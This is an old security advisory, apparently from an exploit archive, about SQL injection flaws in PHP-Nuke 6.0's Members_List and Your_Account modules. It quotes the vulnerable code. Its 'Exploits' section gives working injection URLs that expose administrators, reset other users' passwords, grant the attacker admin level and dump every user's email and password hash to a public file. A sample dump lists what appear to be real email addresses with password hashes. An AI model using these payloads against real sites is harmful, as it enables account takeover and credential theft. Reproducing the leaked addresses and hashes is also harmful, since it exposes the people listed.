phpnuke60.txt

phpnuke60.txt: Posted Mar 10, 2003; Authored by Frog Man | Site phpsecure.info; PHP Nuke 6.0 is vulnerable to multiple SQL injection attacks that will allow an attacker to access member lists, show users by user ID, show moderators, show administrators, privilege escalation, and more.; tags | exploit, php, sql injection; SHA-256 | fe41573d8793ef04be219cd767b52d76999813cb7aff1ed34330fd4dc79bbdee; Download | Favorite | View
phpnuke60.txt


Informations :
°°°°°°°°°°°°°°
Language : PHP
Website : https://www.phpnuke.org
Versions : 6.0 (& 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : This will work if magic_quotes_gpc=OFF.


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/modules/Members_List/index.php :

------------------------------------------------------------------------
[...]
        $count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
        $select = "select uid, name, uname, femail, url from 
".$user_prefix."_users ";
  $where = "where uname != 'Anonymous' ";

  if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
            $where .= "AND uname like '".$letter."%' ";

        } else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
            $where .= "AND uname REGEXP \"^\[1-9]\" ";

        } else {
            $where .= "";
        }
        $sort = "order by $sortby";
        $limit = " ASC LIMIT ".$min.", ".$max;

        $count_result = sql_query($count.$where, $dbi);
        $num_rows_per_order = mysql_result($count_result,0,0);

        $result = sql_query($select.$where.$sort.$limit, $dbi) or die();


        echo "<br>";
        if ( $letter != "front" ) {
            echo "<table width=\"100%\" border=\"0\" 
cellspacing=\"1\"><tr>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";
            $cols = 4;
[...]
------------------------------------------------------------------------


/modules/Your_Account/index.php :
------------------------------------------------------------------------
switch($op) {
[...]
    case "mailpasswd":
  mail_password($uname, $code);
  break;

    case "userinfo":
  userinfo($uname, $bypass, $hid, $url);
  break;

    case "login":
  login($uname, $pass);
  break;
[...]
    case "saveuser":
  saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, 
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, 
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
  break;
[...]
    case "savehome":
  savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, 
$popmeson);
  break;

    case "savetheme":
  savetheme($uid, $theme);
  break;
[...]
    case "savecomm":
  savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
  break;
[...]
}
------------------------------------------------------------------------


/modules/Your_Account/index.php :
------------------------------------------------------------------------
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, 
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, 
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
    global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, 
$module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  if (!eregi("https://", $url)) {
      $url = "https://$url";
  }
  if ((isset($pass)) && ("$pass" != "$vpass")) {
      echo "<center>"._PASSDIFFERENT."</center>";
  } elseif (($pass != "") && (strlen($pass) < $minpass)) {
      echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> 
"._CHARLONG."</center>";
  } else {
      if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = 
FixQuotes($bio); }
      if ($pass != "") {
    cookiedecode($user);
    sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
    $pass = md5($pass);
    sql_query("update ".$user_prefix."_users set name='$realname', 
email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' , 
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', 
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', 
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', 
newsletter='$newsletter' where uid='$uid'", $dbi);
    $result = sql_query("select uid, uname, pass, storynum, umode, uorder, 
thold, noscore, ublockon, theme from ".$user_prefix."_users where 
uname='$uname' and pass='$pass'", $dbi);
    if(sql_num_rows($result, $dbi)==1) {
        $userinfo = sql_fetch_array($result, $dbi);
        
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
    } else {
        echo "<center>"._SOMETHINGWRONG."</center><br>";
    }
    sql_query("UNLOCK TABLES", $dbi);
      } else {
    sql_query("update ".$user_prefix."_users set name='$realname', 
email='$email', femail='$femail', url='$url', bio='$bio', 
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', 
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', 
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', 
newsletter='$newsletter' where uid='$uid'", $dbi);
      if ($attach) {
    $a = 1;
      } else {
    $a = 0;
      }
      }
      Header("Location: modules.php?name=$module_name");
  }
    }
}
[...]
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, 
$popmeson) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  if(isset($ublockon)) $ublockon=1; else $ublockon=0;
  $ublock = FixQuotes($ublock);
  sql_query("update ".$user_prefix."_users set storynum='$storynum', 
ublockon='$ublockon', ublock='$ublock', broadcast='$broadcast', 
popmeson='$popmeson' where uid='$uid'", $dbi);
  getusrinfo($user);
  docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
  Header("Location: modules.php?name=$module_name");
    }
}

function savetheme($uid, $theme) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  sql_query("update ".$user_prefix."_users set theme='$theme' where 
uid='$uid'", $dbi);
  getusrinfo($user);
  docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
  Header("Location: modules.php?name=$module_name&theme=$theme");
    }
}
[...]
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, 
$commentmax) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  if(isset($noscore)) $noscore=1; else $noscore=0;
  sql_query("update ".$user_prefix."_users set umode='$umode', 
uorder='$uorder', thold='$thold', noscore='$noscore', 
commentmax='$commentmax' where uid='$uid'", $dbi);
  getusrinfo($user);
  docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
  Header("Location: modules.php?name=$module_name");
    }
}
[...]
------------------------------------------------------------------------



/modules/Your_Account/index.php :
------------------------------------------------------------------------
[...]
function mail_password($uname, $code) {
    global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, 
$module_name;
    $result = sql_query("select email, pass from ".$user_prefix."_users 
where (uname='$uname')", $dbi);
    if(!$result) {
  include("header.php");
  OpenTable();
  echo "<center>"._SORRYNOUSERINFO."</center>";
  CloseTable();
  include("footer.php");
[...]
------------------------------------------------------------------------


------------------------------------------------------------------------
[...]
function userinfo($uname, $bypass=0, $hid=0, $url=0) {
    global $user, $cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, 
$broadcast_msg, $my_headlines, $module_name;
    $result = sql_query("select uid, femail, url, bio, user_avatar, 
user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, 
user_sig, pass, newsletter from ".$user_prefix."_users where 
uname='$uname'", $dbi);
    $userinfo = sql_fetch_array($result, $dbi);
[...]
------------------------------------------------------------------------



------------------------------------------------------------------------
[...]
function login($uname, $pass) {
    global $setinfo, $user_prefix, $dbi, $module_name;
    $result = sql_query("select pass, uid, storynum, umode, uorder, thold, 
noscore, ublockon, theme, commentmax from ".$user_prefix."_users where 
uname='$uname'", $dbi);
    $setinfo = sql_fetch_array($result, $dbi);
[...]
}
[...]
------------------------------------------------------------------------




Exploits :
°°°°°°°°°°
Members_List :
- Show users (order by crypted pass) :
https://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- Show users (order by UID) :
https://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- Show moderators :
https://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*

- Show administrators :
https://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*

- Show all users having a crypted pass beginning with 'abc' :
https://[target]/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'abc%25'/*

- Etc...


Your_Account :
- Change the name of 'Admin' user into "hophophop" :

https://[target]/modules.php?name=Your_Account&op=savetheme&theme=',name='Hophophop'%20where%20uname='Admin'/*&uid=[OUR_UID]

- Change the Bob's password INTO md5_decrypted 
'd41d8cd98f00b204e9800998ecf8427e' :

https://[target]/modules.php?name=Your_Account&op=savetheme&theme=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=saveuser&realname=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=saveuser&email=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=savehome&storynum=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=savehome&ublockon=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=savecomm&umode=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=savecomm&thold=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]


or...or... and or again :p


- Change our own user account level into admin level :
https://[target]/modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=saveuser&femail=',user_level='4&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=saveuser&url=https://',user_level='4&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=savehome&broadcast=',user_level='4&uid=[OUR_UID]
or :
https://[target]/modules.php?name=Your_Account&op=savecomm&uorder=',user_level='4&uid=[OUR_UID]
or etc...




- Save all users' email & crypted password into 
https://[target]/AllMailPass.txt :

https://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path/to/site]/AllMailPass.txt'/*

It will give in https://[target]/AllMailPass.txt anything like :
--------------------------------------------------------
chaeyut@yahoo.com  a34e83e6658923ceb100abb52cd31df6
for-ever@yahoo.com  5728cea4924d9097c78d08165ad1dd8a
runbur@netzero.com  546fa9501a436d4615b798f856386ba8
venom@yahoo.com    614edfbc874f09d75b98240295a8f39f
gotchakd@yahoo.de  fbd125e74581979d2b7fc6e2b360e286
cfischer@mindspring.com  9407c826d8e3c07ad37cb2d13d1cb641
mike@xiradio.com  f9ac6b05beccb0fc5837b6a7fef4c1d3
mikdif@yahoo.com  6106edf3e22b0cd8609fa1112d0ae962
mcurry@hotmail.com  739897be3e14cf5a9fb032069f522b77
--------------------------------------------------------

(crypted password can be sent by cookie to access to the account).


- Save the informations about users wich have an uid between 190 and 196 
into https://[target]/1.txt :

https://[target]/modules.php?name=Your_Account&op=userinfo&uname='%20OR%20uid>190%20AND%20uid<196%20INTO%20OUTFILE%20'/[path/to/site]/1.txt



- Save all informations about admins, moderators,... into 
https://[target]/admintxt :

https://[target]/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/[path/to/site]/admin.txt



etc etc ... !


[path/to/site] can be found (for example) on 
https://[target]/modules/Forums/bb_smilies.php (Path Disclosure Security 
Hole).


Solution :
°°°°°°°°°°
A patch has been created and published on https://www.phpsecure.info .


More Details :
°°°°°°°°°°°°°°
In French :
https://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt

Translated by Google :
https://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHP-Nuke6.0-Members_List-Your_Account.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



Credits :
°°°°°°°°°
Greetz to T. Rodriguez, [RaFa], Webotheque.be
Author : frog-m@n
https://www.phpsecure.info .


_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM ! 
https://www.fr.msn.be/gsm/servicesms/messengerparsms
Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files
File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other
phpnuke60.txt

phpnuke60.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpnuke60.txt

Share This

phpnuke60.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems
